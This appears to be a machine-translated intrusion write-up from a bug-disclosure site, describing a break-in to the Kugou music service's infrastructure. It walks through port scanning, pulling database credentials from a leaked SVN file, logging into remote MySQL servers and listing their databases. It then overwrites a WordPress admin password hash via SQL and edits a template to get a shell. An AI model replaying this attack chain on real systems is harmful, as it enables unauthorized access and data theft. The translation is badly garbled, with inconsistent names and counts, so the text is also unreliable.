Cool dogs can be easily penetrated into vulnerabilities to expose vulnerable security architecture

Today, I am going to watch a set of shadows and sleep for hundreds of times. I didn't think tudou was hijacked. -_-|!
Start the cool dog music and listen to the live broadcaster and then sleep. -_-|!
Let's go and have a look! Let's Go !~ Ps: xsser: I would like to ask, Rank has wood has 40 60?
(In view of the persistent impact on the overall architecture of cool dog, detailed descriptions of the fuzzy processing, not fuzzy version contact nightwi3h@qq.com request)
No.0 analysis and judgment:

Codoon, as a manufacturer mainly engaged in streaming media services, must be a lot of servers such as CDN, distribution load, and P2P management. As a leader of wooqian, go to the Intranet Database!

The difficulty lies in how to find the fragile system boundary by setting aside a large number of cdns of codoy.

No.1 collect information:

As a result, the Google wall is too powerful. Use duniang. Find two domain names that are not added with CDN: xxx1.kugou.com [113.106.x.x3] xxx2.kugou.com [183.60.x.x] section 183.60. As a amateur Security O & M service, this section has many anti-DDoS pro instances, of course, CDN is also quite large. Give up.

Scan 113.106.x.x3/24: (only useful results will be left)

　　
113.106.x.x1 H3C Router
113.106.x.x3 3306
113.106.x.x7 3306
113.106.x.x9 3306
113.106.x.x9 80

Analysis: It seems that H3C is followed by cool dogs. Please pay attention to the following :)

Hanging SRCWVS [http://www.srcwork.com] scan the Web, it is easy to get a SVN source code leakage: http://113.106.x. x9/admin/x/xfig /. svn/text-base/test. inc. php. svn-base

$ DbConfig ['default'] = array (
'Db _ type' => 'mysql ',
'Db _ charset' => 'utf8 ',
'Db _ PERSISTENT '=> false,
'Db _ host' => '10. 10.10.7 ',
'Db _ user' => 'admin ',
'Db _ passwd' => 'jxx ',
'Db _ name' => 'mmv ',
);
// Recommended database configuration.
$ DbConfig ['tuian Ian '] = array (
'Db _ type' => 'mysql ',
'Db _ charset' => 'utf8 ',
'Db _ PERSISTENT '=> false,
'Db _ host' => '10. 10.10.3 ',
'Db _ user' => 'outtransql ',
'Db _ passwd' => 'xxoo ',
'Db _ name' => 'tuian Ian'
　　

(Obtain the connection information of the PHP framework source code and Intranet Database of cool dog)

No. 3: Analysis:

The x9 source Code should be a PHP framework developed by codoy. The security is good, and the simple Code vulnerability is basically useless. However, we 'd like to get a BashShell first. Since the framework cannot be used, the database is on the Intranet. What should we do? The bottleneck is coming. Give me the time for a song. Oh, I understand that this kind of development and testing machine usually writes a database not far from the local machine. How about character?

No. 4: new database discovery:

10.10.10.7 10.10.10.3 10.10.10.9
113.106.x.x7 113.106.x.x3 113.106.x.x9

I understand. It seems that there is no fire attack in 3306.

Cmd> mysql-h 113.106.x.x3-u outtransql-p

　　

Bingo! Database OK!

Mysql> show databases;
+ -------------------- +
| Database |
+ -------------------- +
| Information_schema |
| StandardMusic |
| UnStandardMusic |
| Cloud |
| Cr_debug |
| Imagesetting |
| Ios_jingpin |
| Jinzhj |
| Klok |
| Kml |
| Kugou01 |
| Kugoublog |
+ -------------------- +
32 rows in set

Many databases and root users are allowed to log on remotely (I have a hunch that this is cool.-_-|)

　　

No. 5 target for database Breakthrough:

After the above tests, several connected databases have rich content. But how can I use the database to access the codoon Intranet? By the way, you can see that the KugouX library is a WordPress Blog.

Decisive X.kugou.com was originally an unfinished Blog. Well, don't blame me.

Update kg_users set user_pass = '21232f297a57a5a743894a0e4a801fc3 'where user_login = 'xadmin ';

Log on to the Apsara stack console, change the template, and obtain BashShell OK!

　　

No. 6: simple Architecture Analysis:

Several Web errors can be determined: the cool dog uses NFS (or other network file systems)/data0/data1/data2

Okay:

[/Data2/www.kugou.com/#$ ls
2012
Clientshare
Common
Default.html
Download
Fm2
..........
Yueku
　

Ps: it seems like it's time to close your hands. Click it now. Changing the homepage is not my dish! (By The Way, BS, the potato jacking, I have done it all. My DNS Flush N + 1 times is not good yet. Have you changed others' NS --)

In the last few words, all the other operations except PHPShell have been changed.


Solution:

Do you want to hear me? No.1.2.3.4.5.6.7.8.9.N .) This solution can be written into a complete set of solutions (provided that you have a better understanding of the codoy architecture.

Wish you a better cool dog! I am a loyal user.